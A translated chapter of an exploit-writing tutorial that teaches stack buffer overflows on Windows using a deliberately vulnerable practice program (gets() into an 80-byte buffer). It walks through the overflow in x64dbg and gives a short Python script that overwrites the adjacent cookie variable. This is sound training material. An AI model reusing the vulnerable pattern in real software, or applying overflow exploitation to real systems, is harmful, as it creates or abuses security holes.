Introduction to exploiting and reversing using IDA FREE and other free tools. Chapter 2

In the first part, we installed several tools that will be useful throughout this course. What they have in common is that they are all free. We will not use any paid tools, and for those that have a paid version, such as IDA or PYCHARM, we will use the FREE or COMMUNITY edition.

Let's look at some concepts before we get started with the exercises.

What is a BUG?

A BUG is the result of a failure or omission in the process of creating computer programs (software) or a computer. The failure can occur at any stage of the software life cycle, although the most obvious ones occur during development and programming.

As I always say, a programmer can make mistakes, and these mistakes can cause crashes or other faulty behavior. So far, I have not said anything new.

The question is how a BUG differs from a VULNERABILITY, so let's see what a VULNERABILITY is.

What is a VULNERABILITY?

A VULNERABILITY is a certain type of bug in a program that can be used to violate the security of a computer system.

Thus, vulnerabilities make it possible to perform actions the program was never intended to perform, and to abuse them.

In other words, vulnerabilities are a subset of bugs: every vulnerability is a bug, but not every bug is a vulnerability.



Of course, there are many types of vulnerabilities. We are going to focus on the study and exploitation of vulnerabilities in WINDOWS.

What is an EXPLOIT?


An EXPLOIT is a computer program that tries to take advantage of a vulnerability in another program. The ultimate goal of an exploit can be malicious, such as destroying or shutting down the attacked system, although it usually consists of bypassing security measures in order to gain unauthorized access to information and use it for the attacker's own benefit or as a springboard for attacks on third parties.

Abusing a vulnerability can lead to a failure of the application or of the system itself, or to the execution of native code on local or remote machines. How the exploit works and how complex it is depend on the vulnerability itself, the environment, and the protections the target has in place at the time of exploitation.

The first type of vulnerabilities we will examine will be buffer overflows. We will start with the simplest examples, and then we will gradually increase the complexity.

At first, the system's security features will not be activated, but we will gradually enable them to learn how to deal with them and in which situations.

What is a BUFFER?


A BUFFER is a memory space of a certain size reserved for storing and handling data.

A basic example is a 20-liter jar that I use for storage. Its contents can be less than or equal to 20 liters, which is the maximum capacity. If you want to store more in a single jar, you must find a way to increase its size; otherwise, when you try to pour, for example, 40 liters into a 20-liter jar, it will overflow.

What is a BUFFER OVERFLOW?


A BUFFER OVERFLOW occurs when a computer program writes more data to a buffer than the memory reserved for it can hold, so the excess ends up in the adjacent memory.

https://www.welivesecurity.com/la-es/tag/buffer-overflow-la-es

In practice, a buffer overflow occurs in an application when its code lacks the necessary security checks, such as measuring the amount of data to be copied into the buffer and making sure it does not exceed the buffer size.

The most common types of buffer overflows are stack buffer overflows and heap buffer overflows.

This is the definition of a buffer overflow. In our previous example, if I try to pour 40 liters into a 20-liter jar, it will overflow. A buffer overflow is the same thing: the buffer overflows when its maximum capacity is exceeded.
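The missing check described above can be illustrated with a minimal Python sketch. The helper name checked_copy and the 20-byte "jar" are hypothetical and exist only for this illustration; Python itself does not overflow like C, so this only models the length test that a safe copy would perform.

```python
def checked_copy(buffer: bytearray, data: bytes) -> None:
    """Copy data into buffer only if it fits (hypothetical helper)."""
    if len(data) > len(buffer):
        raise ValueError("input of %d bytes does not fit in a %d-byte buffer"
                         % (len(data), len(buffer)))
    buffer[:len(data)] = data


jar = bytearray(20)               # a 20-byte "jar"
checked_copy(jar, b"x" * 20)      # fits exactly, so it is accepted

try:
    checked_copy(jar, b"x" * 40)  # twice the capacity, so it is rejected
    overflow_rejected = False
except ValueError:
    overflow_rejected = True

print(overflow_rejected)
```

A program without this kind of test simply keeps writing past the end of the buffer, which is the situation we will exploit in the exercises.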

Now let's explain the difference between the stack and the heap.

What is a STACK?


The STACK is used to store local function variables that are needed only while the function is executing. In most programming languages, we must know at compile time how large a variable is if we want to keep it on the stack.

What is a HEAP?


The HEAP is used to reserve dynamic memory whose lifetime is not known in advance but is expected to last for some time. If the size is unknown or is determined at runtime, it must be calculated and the memory reserved on the heap.

The heap is also used for objects that vary in size, because we do not know at compile time how large they will be.

I have worked at our company for more than 13 years as an exploit writer, and the first thing we do with every new hire, and what was done with me when I joined, is have them try to solve the stack and heap exercises of the famous GERARDO RICHART. He is one of the founders of CORE SECURITY and an exploit analysis guru.

We will start slowly with the simplest stack exercises. As I said, for now they are compiled with minimal protection and as 32-bit binaries to make exploitation easier.

Let's look at the source code for the STACK1 task.

https://drive.google.com/open?id=16btJAetpa1V5yHDZE2bnnFWTQNpsUR4H

We see a folder with the exercises, and inside it is the STACK1 source code, named STACK1_VS_2017.CPP.

#define _CRT_SECURE_NO_WARNINGS
#define _CRT_SECURE_NO_DEPRECATE

#include <stdlib.h>
#include  <stdio.h> 
#include "Windows.h"


int main(int argc, char **argv) 
{


	MessageBoxA((HWND)-0, (LPCSTR) "Imprimir You win..\n", (LPCSTR)"Vamosss", (UINT)0);

	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x41424344) printf("you win!\n");

}


We will try to understand this code and see where the buffer overflow may occur, and whether it will be a buffer overflow on the stack or on the heap.

The MessageBoxA call was added to the STACK1 source code to show a small message prompting us to solve it. It is just an addition that does not affect anything else: a standard call to this WINDOWS function, which we will not analyze here.

Anyone who needs more information about this function can find it in Microsoft's documentation for MessageBoxA.

We know that if a function has local variables, space must be reserved for them.

So we are left with this source code, created by GERARDO RICHART.

int main(int argc, char **argv) 
{

	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x41424344) printf("you win!\n");

}

The first part of the program, shown in red, is where space is reserved for the local variables. In this case, there are two local variables, COOKIE and BUF.

You can see the data types in the table. Other types of variables are also listed there.

The code will be compiled as 32-bit.

We see that the COOKIE variable will be of type INT, so 4 bytes of memory will be reserved for this variable.



In the case of the BUF variable, we see that it is an array of characters, that is, a string (each character is 1 byte).



That is, it will be an array of 80 characters, so its length will be 80 x 1 = 80 bytes.

Anyone who does not know what an array is can read about it here:

https://www.programiz.com/c-programming/c-arrays

Thus, an array can store many values of the same data type. You just have to tell it what type of data it will hold and how many elements there will be.



In the first example, this is an array of 100 integers, and since each integer takes 4 bytes, the length of the array will be 100 x 4 = 400 bytes.

In the second example, a FLOAT takes 4 bytes and the array holds 5 of them, so its length will be 5 x 4 = 20 bytes.
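The same arithmetic can be checked with a short Python sketch that uses the standard ctypes module to build the equivalent C array types. The names IntArray100, FloatArray5 and CharArray80 are hypothetical, and the sizes assume a platform where int and float take 4 bytes, as in our 32-bit exercise.

```python
import ctypes

# Array types mirroring the C declarations discussed above.
IntArray100 = ctypes.c_int * 100    # like an array of 100 int
FloatArray5 = ctypes.c_float * 5    # like an array of 5 float
CharArray80 = ctypes.c_char * 80    # like: char buf[80];

int_bytes = ctypes.sizeof(IntArray100)      # 100 x 4
float_bytes = ctypes.sizeof(FloatArray5)    # 5 x 4
char_bytes = ctypes.sizeof(CharArray80)     # 80 x 1

print(int_bytes, float_bytes, char_bytes)
```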

When we analyze an array at a low level, we will see that it is a reserved memory space, or buffer. It is not the only way to reserve memory: other kinds of variables also need reserved space in memory, which acts as a buffer for their contents.

Returning to our exercise:

char buf[80];

This is an array of characters 80 x 1 = 80 bytes long, i.e. it is like our 20-liter jar. If we try to store more than 80 bytes in it, the jar will overflow.

Now let's see where the BUF buffer is used.



We see that the buffer is used in two places marked with red arrows.

The first statement is a call to the PRINTF function, which displays a message in the console. The message is based on the quoted string:

"buf: %08x cookie: %08x\n"

However, PRINTF does not simply print the quoted string; it prints it according to the specified format. The percent signs inside tell us how the output line will be built. The format string is only the first argument to the function. It can be followed by several other arguments (one for each % specifier in the format). In our case, there are two of them.



In this case, we have two %x specifiers, so if I refer to the PRINTF format table:



We see that the function will take these values as integers (INT) and insert them into the output line in base 16, i.e. in hexadecimal. The 08 means that if the number has fewer than 8 digits, the function pads it on the left with zeros until it is 8 characters wide.

Without the leading 0 in the width, the padding is done with spaces. For example, the output for "buf: %31x", &buf will look like this:

buf:             19FED4 

We see that in this example the number is preceded by padding spaces. There are several modifiers that control how the output is displayed.

All possible cases are listed here:

http://www.cplusplus.com/reference/cstdio/printf/

Our case is this:





We see that the result is never truncated; it is padded only if the length of the value to insert is less than the width given before the x.
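The width and padding behavior can be tried quickly in Python, whose % operator follows the same conventions as PRINTF for these specifiers. This is only a sketch: the variable names are hypothetical, and the address is the one printed on my machine.

```python
buf_address = 0x19FED4  # address printed on the author's machine

zero_padded = "%08x" % buf_address     # 0 flag: pad with zeros up to width 8
space_padded = "%31x" % buf_address    # no 0 flag: pad with spaces up to width 31
not_truncated = "%04x" % buf_address   # width smaller than the number: nothing is cut

print(zero_padded)
print(space_padded)
print(not_truncated)
```

Note that %x prints the hexadecimal digits in lowercase, while %X prints them in uppercase.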

So we know that the function prints two hexadecimal numbers, taken from the two arguments.

printf("buf: %08x cookie: %08x\n", &buf, &cookie);

We know that a variable has a memory address and a value stored there. It is like our 20-liter jar: it has its contents or value, i.e. the liters stored inside, but if I have a garage full of similar jars, I also need some way to tell where the jar I want is among all the ones I have.

The & symbol does exactly that. It returns the address or location of the jar, not its contents or value.

Definition of AMPERSAND


The AMPERSAND (&) is used to obtain the memory address of the variable in which the data will be stored.

Therefore, if I run the executable file in the console, I will see, for example, that when it executes the PRINTF function, it will print:



The addresses may be different on your PC, but since the lower of the two addresses is the BUF address, we see that the variables are laid out like this:



The BUF address is lower than the COOKIE address, so BUF sits above COOKIE in the stack view.

And what do these variable addresses tell us? (In my case, &buf = 0x19FED4 and &cookie = 0x19FF24)



Both are in hexadecimal. Remember that this was the %x format? So I put 0x in front to distinguish them from decimal numbers, which we will write without any prefix.

If I do the subtraction in the PYTHON console or in PYCHARM:



We get a result of 80 bytes, since the COOKIE variable supposedly starts exactly where the BUF buffer ends, so the difference gives us the size of the buffer.
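The subtraction can be reproduced with the following lines, using the two addresses printed on my machine (yours will probably differ, but the distance should be the same). The variable names are only illustrative.

```python
buf_address = 0x19FED4     # &buf as printed on the author's machine
cookie_address = 0x19FF24  # &cookie as printed on the author's machine

distance = cookie_address - buf_address
print(distance, hex(distance))
```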

Often, when we estimate the size of a variable like this from the source code, the compiler may actually give it more space than the source code asks for. The compiler guarantees that it will reserve at least 80 bytes, i.e. it can reserve more, but not less.

The point is that, thanks to the PRINTF call, we already know something about the code, the sizes of the variables, and where they are located.

Now let's look at the other place where the BUF buffer is used, because so far the program only prints its address and does not store any data in it.

int main(int argc, char **argv) 
{

	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x41424344) printf("you win!\n");

}

Here, on the red line, GETS is a function that reads data from the keyboard. Data is read until I press ENTER.

This function has no way to limit the amount of data entered by the user, and there is no way to validate that data either. Everything typed before pressing the ENTER key is copied into the BUF buffer.

This is the problem. We said that BUF can store 80 bytes at most, so if we enter more, we cause a buffer overflow. All the conditions for it are present here: if the user types more than 80 bytes, our jar overflows and the liquid spills downward.



The point is that right below BUF is the COOKIE variable, so the overflow will overwrite it with a value that you control.

For example, if the person typing enters 80 A's followed by 4 B's, the 80 A's will fill BUF and the 4 B's will fill COOKIE. As we know, when someone types a character in the console, what is stored at a low level is its ASCII value.



Since COOKIE will be filled with four letters B, each of which has the ASCII value 0x42, we can be sure that the COOKIE value will be 0x42424242, i.e. on my computer, address 0x19FF24 (COOKIE) will contain 0x42424242.

0x19FF24 => 42424242
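The effect can be modeled with a small Python sketch. It is only a simulation under stated assumptions: a bytearray stands in for the 84 bytes of the two local variables, with BUF at offset 0 and COOKIE right after it, and the hypothetical helper unchecked_copy imitates a copy that never looks at the buffer size. The terminating zero byte that GETS also writes is left out of the model.

```python
import struct

BUF_SIZE = 80
COOKIE_SIZE = 4

# Model of the two locals: buf occupies offsets 0..79, cookie offsets 80..83.
frame = bytearray(BUF_SIZE + COOKIE_SIZE)


def unchecked_copy(memory: bytearray, data: bytes) -> None:
    """Copy data starting at offset 0 without ever checking BUF_SIZE."""
    memory[0:len(data)] = data


unchecked_copy(frame, b"A" * 80 + b"B" * 4)

# Read the 4 bytes after buf as a 32-bit little-endian integer.
cookie = struct.unpack_from("<I", frame, BUF_SIZE)[0]
print(hex(cookie))
```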



The point is that we have now seen how to overflow the buffer and control the COOKIE value.

int main(int argc, char **argv) 
{

	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x41424344) printf("you win!\n");

}

To complete the exercise, the program must print "you win". For this, COOKIE must equal 0x41424344, and without the overflow this would be impossible, since the program never assigns a value to COOKIE. This is where the buffer overflow comes in: as we said, it can make the program perform an action other than what was programmed.

In this case, the program can never print "you win" on its own; only the overflow makes it possible.


In other words, instead of passing, for example, 80 A's and 4 B's, to print "you win" you must pass 80 A's followed by the letters DCBA, since typing them stores the following ASCII byte values in COOKIE, in this order:

44434241

https://www.arumeinformatica.es/blog/los-formatos-big-endian-y-little-endian/

Data is stored in LITTLE ENDIAN format. Put simply, the bytes of a multi-byte value are stored in memory in reverse order, with the least significant byte first.



So if the value 0x41424344 is saved, the system will store it in memory as:

44 43 42 41

For this reason, since the bytes are copied into memory in the order we type them, we must type the value in reverse order so that it has the right form when it is read back from memory.
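The byte order can be verified with Python's standard struct module. In this sketch, "<I" means a 32-bit unsigned integer in little-endian order; the variable names are only illustrative.

```python
import struct

target = 0x41424344

# How the 32-bit value is laid out in memory on a little-endian machine.
in_memory = struct.pack("<I", target)
print(in_memory)

# The other direction: the bytes typed as DCBA, read back as a 32-bit integer.
typed = b"DCBA"
value_read_back = struct.unpack("<I", typed)[0]
print(hex(value_read_back))
```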

We can run the executable in the console.



The cursor will blink, because the GETS function is waiting for my input. Carefully type 80 A characters followed by DCBA.

In the PYTHON or PYCHARM console, I can print the string, copy it without the quotes, and paste it into the console to avoid typing it all by hand, and then press the ENTER key to submit it.
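For example, the string can be generated like this (the name payload_text is just illustrative):

```python
# 80 A's to fill buf, then DCBA to overwrite cookie with 0x41424344.
payload_text = "A" * 80 + "DCBA"
print(payload_text)
```

Using print shows the string without quotes, so it can be copied directly.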





We see that we got “you win”.

We can see this in the debugger. For this we will use X64DBG.



I choose the 32 bit version.





If the debugger stops in the NTDLL.DLL library, we press RUN again with F9.

We see that the debugger stops at the first instruction of the STACK1 module, known as the ENTRY POINT, i.e. the first instruction the module executes.



Obviously, this does not look like our source code. You must understand that the compiler adds a lot of code to make the executable start and run correctly. We will try to find our main function. We can orient ourselves by looking at the strings of the program.



We chose to search only in the current region, since we know that the strings will be in the same section.



Here we see that there are strings from the program and others that the compiler added. We double-click on one of ours.



Now we can see a lot more: calls to the MessageBoxA, PRINTF, and GETS functions, and a comparison with the value 0x41424344.

In addition, we add the SNOWMAN decompiler plugin. We can see how it decompiles the code, i.e. how it tries to recover the source code, or something as close to it as possible, from the compiled file.





We see that it is not perfect, but it is better than what we had.

I am going to set a breakpoint (BP) at the beginning of the function and press F9 until the debugger stops there.



For those who do not know what a function argument is.



In our case, the main function has arguments, but they are not used inside the function.

int main(int argc, char **argv) 
{

	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x41424344) printf("you win!\n");

}

Here we see that there are two arguments, and they are passed on the stack when the executable is compiled as 32-bit.

Just before the function call, the arguments will be stored on the stack.

When we stop at the beginning of the function, the first value on the stack will be the RETURN ADDRESS, i.e. where execution will continue after the function completes, and below this value will be the arguments of the function.

If I right-click on the RETURN ADDRESS and select FOLLOW DWORD IN DISASSEMBLER, I will see where execution should return after the function completes.



Execution will return here, which means that the main function was called from the CALL just above. I can set a BP there, restart the exercise, and confirm that this is the case.



I will set the BP a little earlier and restart the program.



The debugger will stop here.



It is about to save the arguments of the main function using these PUSH instructions.

Below is a link for those who want to know more about the function arguments:

https://publications.gbdirect.co.uk/c_book/chapter10/arguments_to_main.html

This is not very difficult. The first argument, ARGC, is an INT that indicates the number of console parameters used to run the program, including the path to the executable, and ARGV is an array of pointers to strings.

Let's see what happens if I change the command line to pass more arguments and restart.





Here the debugger stops when the program is about to save the arguments using PUSH instructions. The arguments are pushed from last to first: the argument pushed first is the farthest one, and the last one pushed is the first argument of the function.

As I trace, each PUSH instruction saves one argument.



Here I can see the arguments of the function. At the top is the first argument, ARGC. It is 3, since it counts the arguments passed on the command line.



Here are 3 arguments.

Now we press F7 to do STEP INTO and enter the function.

Here we see that when entering the CALL, the RETURN ADDRESS is saved on the stack.



So, as we said, when entering the function the first thing on the stack is the RETURN ADDRESS (in a 32-bit build), and below it are the arguments of the function: the first argument first, and then the rest in order.
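The order described above can be modeled with a tiny Python simulation of a 32-bit stack. Everything here is hypothetical: the class Stack32, the starting ESP, the ARGV pointer and the return address are made-up values for illustration, not the ones from the debugger. Only ARGC = 3 comes from our run.

```python
class Stack32:
    """Minimal model of a 32-bit stack that grows toward lower addresses."""

    def __init__(self, esp):
        self.esp = esp
        self.memory = {}

    def push(self, value):
        self.esp -= 4                  # PUSH first decrements ESP by 4...
        self.memory[self.esp] = value  # ...then stores the value at [ESP]


ARGC = 3                     # number of command-line parameters in our run
ARGV_POINTER = 0x00AA0000    # hypothetical pointer to the argv array
RETURN_ADDRESS = 0x00401234  # hypothetical address of the instruction after CALL

stack = Stack32(esp=0x0019FF40)  # hypothetical initial ESP
stack.push(ARGV_POINTER)         # the last argument is pushed first
stack.push(ARGC)                 # the first argument is pushed last
stack.push(RETURN_ADDRESS)       # CALL pushes the return address

# Print the stack the way the debugger shows it: lowest address on top.
for address in sorted(stack.memory):
    print(hex(address), hex(stack.memory[address]))
```

Reading the output from top to bottom gives the RETURN ADDRESS, then ARGC, then ARGV, which is the layout we see when we stop at the beginning of the function.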



The second argument, as we saw, is an array of pointers. Here we see in memory that there are three pointers to the three strings that are passed as arguments.



Here we have stopped at the beginning of the function; a little lower we have the RETURN ADDRESS and the ARGUMENTS.

We point out that the file is compiled as 32-bit because in 64-bit builds the arguments are passed in a different way. We will see that later.

Then the function begins to execute. The first thing is the so-called PROLOGUE, which stores the EBP value of the function that called ours.



This saves the EBP value just above the return address.



If I step through the instruction using F7,

I see that the saved EBP value is now on the stack, above the return address.



The following instruction in PROLOGUE:

MOV EBP, ESP

It sets EBP for the current function; the value we just saved was that of the parent function that called ours. (In this case, my main function is an EBP-based function. In other cases it may be different, and we will see those later.)

By placing the current ESP value in EBP, we ensure that we create a frame for our current function.



Now, since this function is EBP-based (EBP BASED), the EBP value will stay constant inside the function and will be used as the reference, while ESP will keep changing.



This EBP value is taken as the base.

In EBP-based functions, variables and arguments can be referred to by their distance from this address, which stays in EBP until the function's epilogue.

We can see several variables in the listing that are referred to as EBP-4 or EBP-54, relative to the value EBP currently holds.

We can say that once EBP takes its value after the PROLOGUE, it acts as a dividing line. The arguments are always below it, so EBP + XXX refers to the arguments (the saved EBP and the RETURN ADDRESS are also there, but the code will not reference them), while the variables, as we will see, are above this address, so a reference to EBP - XXX points to some local variable.

Thus, in EBP-based functions:

EBP + XXXX = arguments passed to the function
EBP - XXXX = local function variables

After the PROLOGUE, there will be some way of reserving space for the variables. In our case, this is done by moving ESP up so that the space left below it is reserved for the sum of the lengths of all the variables and, sometimes, a little more just in case, depending on the compiler.

00401043 | 83EC 54 | SUB ESP, 54

We see that ESP ends up above EBP, which remains the reference, and that 0x54 converted to decimal is 84, which is the sum of the BUF and COOKIE lengths. Remember that they were 80 and 4 respectively.
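These numbers fit together, as the following Python sketch shows. It assumes that BUF is the variable referenced as EBP-54 and COOKIE the one referenced as EBP-4, and it uses the addresses printed on my machine; the EBP value is not read from the debugger here, it is derived from those two assumptions.

```python
BUF_OFFSET = -0x54         # assumed: buf is the variable referenced as EBP-54
COOKIE_OFFSET = -0x04      # assumed: cookie is the variable referenced as EBP-4
RESERVED = 0x54            # from the instruction SUB ESP, 54

buf_address = 0x19FED4     # &buf as printed on the author's machine

ebp = buf_address - BUF_OFFSET        # derived value of EBP for this run
cookie_address = ebp + COOKIE_OFFSET  # where cookie should then be
esp_after_sub = ebp - RESERVED        # ESP right after SUB ESP, 54

print(hex(ebp), hex(cookie_address), hex(esp_after_sub), RESERVED)
```

The derived COOKIE address matches the 0x19FF24 printed by the program, and the reserved size is exactly 80 + 4 bytes, so in this build the compiler did not add any extra space.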







Executing it creates an 84-byte space for the BUF and COOKIE variables. You can take the EBP value and look for that address in the first column of the stack view. Obviously, it will now be further down.



I double-click here.



This way, the stack view also shows positions relative to EBP.

For example, EBP-4 in the listing corresponds to the entry shown as -4 in the first column of the stack, which the comment also displays as EBP-4.



If I keep tracing, we see that from the position ESP took when reserving the variables, it will only move up from there, because the space allocated for the variables must be respected. When the 4 PUSH instructions for MessageBoxA are executed, the program places the arguments above the reserved space and ESP moves up (its value decreases).



If I look at the stack, I see the 4 arguments, in green, that were added above the reserved space, marked in red.



When you enter the MessageBoxA function, the RETURN ADDRESS of this function is stored on the stack.



Here is the return address of MessageBoxA. I execute MessageBoxA and trace with F8 until I reach the RET of this function.



We see that execution returns to the instruction just below the MessageBoxA call.



The values pushed for the MessageBoxA function and the RETURN ADDRESS of this function have already been consumed, and ESP is again just above the reserved area, as it was before any function was called. The same thing will happen with the call to the PRINTF function.

After stepping over the PRINTF call, the BUF and COOKIE addresses will be printed.



The BUF address on my machine will be 0x19FED4, and the COOKIE address will be 0x19FF24.

Here, the program loads the BUF address to pass it to the GETS function, which will fill BUF. We can check that the address matches the one the console shows, 0x19FED4.





Here we see that it is EBP-54. If I double-click on the stack where it shows -54, it will show that the address is BUF = 0x19FED4 on my machine.



Since the data I enter will be saved at this address, I can follow it in the dump to see how the bytes are stored there.





Here it is. For now, nothing is displayed there, since there is no data yet.

When I step over the GETS call with F8, I need to go to the console, type the input, and press ENTER to fill the BUF buffer and overwrite COOKIE.



We see that the COOKIE variable was at 19FF24 on my machine.

Here, the program compares the cookie with 0x41424344.



We see that EBP-4 is COOKIE. Besides checking the address, we can confirm this by setting the reference of the stack view to the EBP value, as before.



I double-click here.

We see that EBP-4 is COOKIE, since the variable is at offset -4 once the reference is zeroed at EBP.



We see that the program will not take the jump and will show us you win!





So we have manually achieved the goal of printing you win!

We analyzed STACK1 dynamically using X64DBG, which is a debugger and does not let us analyze the program without running it. For static analysis, we must use other tools, such as IDA PRO, GHIDRA or RADARE.

I can also write a template script in PYTHON to exploit the exercise.

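from subprocess import Popen, PIPE

# 80 bytes fill buf; the next 4 bytes overwrite cookie with 0x41424344 (little endian)
payload = b"A" * 80 + b"\x44\x43\x42\x41"

# Adjust the path to wherever the executable is located on your machine
p1 = Popen(r"C:\Users\ricardo\Desktop\abos y stack nuevos\STACK1_VS_2017.exe", stdin=PIPE)
print("PID: %s" % hex(p1.pid))
print("Press Enter to continue")
p1.communicate(payload)  # sends the payload to stdin, closes it, and waits for the process to exit
p1.wait()
input()  # keeps the console open until ENTER is pressed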

In PYTHON 3, I have to put parentheses around the arguments of the PRINT function and be careful with the strings that must be bytes (put b in front of them, which was not needed in PYTHON 2).

I check that the path is correct and run the file.



Good. We now have a template script in PYTHON 3 for exploiting STACK1. In the next part, we will continue with static analysis in IDA, RADARE and GHIDRA.


Please note that in addition to the STACK1 exercise, there are also versions 2, 3 and 4. You can try to solve them. They are very simple and similar to STACK1, so you will not get bored.

In the next part we will see IDA FREE, RADARE and GHIDRA.

See you in part 3.

Ricardo Narvaha
25/10/2019

PS # 1
A beautiful PDF can be downloaded on my home page - yasha.su

PS # 2
Soon I will write a continuation of the article https://habr.com/en/post/464117/ about how I collected help for Father Chris Kaspersky and what came of it.

Do not get bored.
